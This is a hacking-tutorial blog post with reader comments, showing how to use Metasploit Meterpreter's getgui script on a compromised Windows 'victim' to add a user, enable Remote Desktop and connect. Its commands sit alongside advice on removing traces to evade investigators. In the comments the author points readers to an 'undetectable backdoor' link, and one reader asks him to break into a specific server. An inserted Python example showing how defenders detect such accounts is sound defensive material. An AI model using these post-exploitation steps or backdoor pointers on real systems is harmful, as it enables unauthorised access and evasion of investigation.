5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Type : Tutorial

Level : Beginner, Medium

Last year, when I was teaching a computer security class, one student came and asked, "Can you give me a simple tutorial on how to use the command prompt?" I said, "I don't think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue." From this situation I know that not everyone knows the command prompt or anything console-based. How about hacking? Yep, it's the same… sometimes newcomers just follow tutorials without knowing exactly what they are doing.

Today I will write a simple tutorial on how to enable Remote Desktop (which uses the Remote Desktop Protocol on TCP port 3389) when you are already inside a remote system using the Metasploit Framework. This method should be useful if you are limited in how well you can use the command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirements:

1. Metasploit Framework

2. BackTrack 5 (or another Linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter:

1. My favourite Meterpreter payload is reverse_tcp. If you also like to use reverse_tcp for your payload, you can set it with the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

to view the help.

3. To add a user with the username valent and the password r4h45i4, and then enable the Remote Desktop Service:

run getgui -u valent -p r4h45i4

Yep, we have successfully created the user and activated the Remote Desktop Service.

Please note the last line of the output, "For cleanup use command : run multi_console_command….bla…bla….bla"; it will be used after you finish using the Remote Desktop Service of the victim computer.

4. To connect to the victim using Remote Desktop, we can use the rdesktop program (it's already installed on BackTrack).

rdesktop -u <username> -p <password> <ip-address-target>

initializing……and then….

5. You should also remember that when you add a user, you are adding one new user on the remote computer. Be wise in using this method, because the more changes you make, the more traces you leave on the remote computer, and they can be tracked by investigators :-) . Clean up the user we created before (see step 3).
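
The traces mentioned in step 5, seen from the investigator's side, as an added example that is not part of the original post: it correlates a new local account, its addition to the Administrators or Remote Desktop Users group, and Remote Desktop being switched on, then checks for an RDP logon by that account. The event records are constructed and their flat field names are assumptions; the event IDs are those of Windows Vista and later plus Sysmon, and the group names and registry value are standard Windows ones rather than details taken from the post.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
RDP_VALUE = r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
SENSITIVE_GROUPS = {"administrators", "remote desktop users"}

# Constructed sample records, not from a real host. The flat field names are an
# assumption; the IDs are Security 4720 (account created), 4732 (added to a local
# group), 4624 (logon, type 10 = RemoteInteractive) and Sysmon 13 (registry value set).
EVENTS = [
    {"ts": "2024-05-01T10:00:05", "host": "WS01", "id": 13,
     "target": RDP_VALUE, "details": "DWORD (0x00000000)"},
    {"ts": "2024-05-01T10:00:07", "host": "WS01", "id": 4720, "account": "svc_test"},
    {"ts": "2024-05-01T10:00:08", "host": "WS01", "id": 4732,
     "account": "svc_test", "group": "Remote Desktop Users"},
    {"ts": "2024-05-01T10:00:08", "host": "WS01", "id": 4732,
     "account": "svc_test", "group": "Administrators"},
    {"ts": "2024-05-01T10:03:40", "host": "WS01", "id": 4624,
     "account": "svc_test", "logon_type": 10},
    {"ts": "2024-05-01T11:30:00", "host": "WS02", "id": 4720, "account": "newhire"},
    {"ts": "2024-05-01T11:31:00", "host": "WS02", "id": 4732,
     "account": "newhire", "group": "Users"},
]

def find_new_rdp_accounts(events, window=WINDOW):
    """Flag accounts created and put in a sensitive local group within `window` on one
    host, noting whether RDP was switched on and whether the account then used RDP."""
    evs = [{**e, "ts": datetime.fromisoformat(e["ts"])} for e in events]
    findings = []
    for new in (e for e in evs if e["id"] == 4720):
        same_host = [e for e in evs if e["host"] == new["host"]]
        near = [e for e in same_host if abs(e["ts"] - new["ts"]) <= window]
        groups = sorted({e["group"] for e in near
                         if e["id"] == 4732 and e["account"] == new["account"]
                         and e["group"].lower() in SENSITIVE_GROUPS})
        if not groups:
            continue  # ordinary account creation, nothing to correlate
        findings.append({
            "host": new["host"], "account": new["account"], "groups": groups,
            # fDenyTSConnections = 0 means Remote Desktop connections are allowed
            "rdp_enabled": any(e["id"] == 13 and e["target"].lower() == RDP_VALUE.lower()
                               and e["details"].endswith("(0x00000000)") for e in near),
            "rdp_logon": any(e["id"] == 4624 and e.get("logon_type") == 10 and e["ts"] >= new["ts"]
                             and e["account"] == new["account"] for e in same_host),
        })
    return findings

if __name__ == "__main__":
    print(find_new_rdp_accounts(EVENTS))
```

On the constructed data only `svc_test` on WS01 is reported; `newhire` is skipped because the Users group is not in the sensitive set.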

Finish…

Hope it's useful for you… any questions? Just drop them in the comment box. :-)

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

  • Hagai

    Hi,
    I have a beginner's Q. :)
    Where do I find the Meterpreter in BT5?

  • puppet

    How do we know the username and password of the victim???
    And do we need to add a new user to the victim computer?

    • http://www.vishnuvalentino.com v4L

      #puppet
      First of all, you should find a vulnerable target… and then try to compromise it… when you successfully compromise the target, you don’t need to input any password or username :-)

  • mehdi

    I have a problem: Unknown command: rdesktop

    • http://www.vishnuvalentino.com v4L

      #mehdi
      Hmm… maybe you don’t have rdesktop installed… try running apt-get install rdesktop.

  • th3bAdh

    I have a problem with rdesktop: the password was invalid, but I've double-checked the password and am still getting the error

    • http://www.vishnuvalentino.com v4L

      #th3bAdh
      Hmm… if the password was correct there should be no error like this… maybe the password was empty or there is an issue with keyboard localization..

  • vir0e5

    Thx for info….
    Download RDesktop
    http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz

  • josh

    I am using the following payload:
     (windows/shell/reverse_tcp):
    but when I run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens….. Do you know what could be the possible reason for this?
    Thanks!
     
     

    • http://www.vishnuvalentino.com v4L

      #josh
      Maybe it means that the target isn’t vulnerable.

  • bagus

    When I write getgui – h run and run the command, it says unknown ..
    What should I do?

    • http://www.vishnuvalentino.com v4L

      #bagus
      Are you already inside the meterpreter console?

  • DeusIgni

    Whenever I attempt to create a shell on the target computer, the handler is created on my end, but the connection times out. Why is that? Is it an error on my end?
    -DeusIgni

    • http://www.vishnuvalentino.com v4L

      #DeusIgni
      Hmm, maybe the target prevents you from creating it… getting meterpreter doesn’t mean that you’ll also get the shell… it depends on the vulnerability ranking… FYI the target machine in this tutorial was XP SP0..

  • DeusIgni

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

  • boby

    Hi,
    I am using BT5 R2 in VMware. I am trying to remotely control my Win 7 desktop. When meterpreter session -i 1 is started like
    meterpreter>
    when I enter the shell, pwd or cd command it gives me an error of unknown command.
    What should I do??

    • http://www.vishnuvalentino.com v4L

      #boby
      Maybe the rating of the exploit you use is not an excellent one. BTW, if you want to try and make sure it works you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  • boby

    I'm using windows/meterpreter/reverse_tcp, and I have the same problem. I have tried java_signed_applet and I still have this problem, "unknown command". When I was using BackTrack 5 R1 it was working very well.
    Is there any installation problem, or may there be some bugs in BackTrack 5 R2???

  • boby

    metertreter>pwd
    pwd unknoun command
    same problem

    • http://www.vishnuvalentino.com v4L

      #boby
      Hmmm….maybe you can try to update your metasploit framework first by using msfupdate command.

      • boby

        Thank you very much for your reply… :)

        Which tools of BackTrack 5 must be updated after installation?? And which command do I have to use???

        i am using these commands
        for msf
        =======
        1,msfupdate
        for library
        ===========
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        Which command would you suggest to me to update BackTrack 5 R1 or BackTrack 5 R2 for better performance?

        • http://www.vishnuvalentino.com v4L

          #boby
          BTW, I don’t know exactly what your problem is or how you installed your BT. Maybe you can also try to update your system using apt-get update and apt-get upgrade.

  • boby

    My problem is solved. Thanks for your help.

  • deff

    What is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more useful to actually explain it than just provide script kiddies…

    • http://www.vishnuvalentino.com v4L

      #deff
      LoL…maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      If you think like that, why didn’t you contribute by writing an “awesome tutorial” here? Or maybe give your own tutorial link… don’t just talk and criticize without action :-P it’s just wasting your time… :-)
      PS: next time it’s better to use your real e-mail, not the fake one :-)
      merci monsieur

  • Puka

    I have Metasploit 4.4 GUI Community Edition but no change to exploit. BTW, I have Windows 7 SP1.

    • http://www.vishnuvalentino.com v4L

      #Puka
      I don’t understand?

  • anonymous

    I have installed BackTrack on VMware and hacked my Windows 7 system with the system's internal IP, but how can I set my dynamic IP to hack a computer remotely?

    • http://www.vishnuvalentino.com v4L

      #anonymous
      read more here : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Samuel

    Hi, when I tried to do the rdesktop -u ( ) -p ( ) and the IP address and pressed enter, it says Autoselected keyboard map en-us and does not do anything… do you know why that happens?

    • http://www.vishnuvalentino.com v4L

      #samuel
      Hmm… maybe the Remote Desktop service on the victim PC hasn’t started yet..
      Maybe you can take a look at this tutorial : http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  • Thirteen

    Thanks for your time and effort to provide tutorials!

  • boby

    hi

    Please give me a tutorial to hack a PC on another network. Please guide me.

    • http://www.vishnuvalentino.com v4L

      #boby
      http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Remaro

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  • http://google.com Josh

    after executing this command :
    run getgui -u testuser -p testpass

    it shows me this message :
    This version of Meterpreter is not supported with this Script!

    what’s the problem?

    • http://www.vishnuvalentino.com v4L

      #josh
      maybe you can try to update the metasploit library msfupdate.

  • boby

    Hi,

    I want to download vanish.sh and crypter.ph for BackTrack 5 R3. I searched for it on Google but I cannot find it. Kindly give me these undetectable backdoors or a download link. I will be very thankful to you.

    • http://www.vishnuvalentino.com v4L

      #boby
      I think you just haven’t searched for it :-)
      http://pastebin.com/7xmvGnks

      • boby

        No, it’s not :D I searched on the net and found the code, but it didn’t work :)
        Thanks for your cooperation :)

  • fahmi

    After I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t show up, why? Thanks

    • http://www.vishnuvalentino.com v4L

      #fahmi

      You need to exploit first and then you can get the meterpreter console. See other hacking tutorials here http://www./category/hacking-tutorial/

  • intoxicate

    Hey, I’ve tried to use getgui through meterpreter but apparently it doesn’t add a user to the remote machine. To prove this, I got on my remote host and ran the net command to see if any user had been added to the administrator local group. But no user has been added to that group. Since it doesn’t add a user to the remote host, I cannot log in via rdesktop. I’m not sure if the script is not working properly or I did something wrong.

    • http://www.vishnuvalentino.com v4L

      #intoxicate

      on victim computer, you need to have system privileges

  • sheaz

    Dear

    v4L, I want to hack a server; its IP is 203.128.26.xxx and remote desktop is already on. I am new in this field. Please only make a user on this server and please give me the user name and password. I am very thankful to you.

  • akbar

    I am a student from Iran ..
    thanks for your this tutorial ….!

  • GuestMan

    Does it work when the victim has Linux?

    • http://www.hacking-tutorial.com/ v4L

      #Guestman
      no it cannot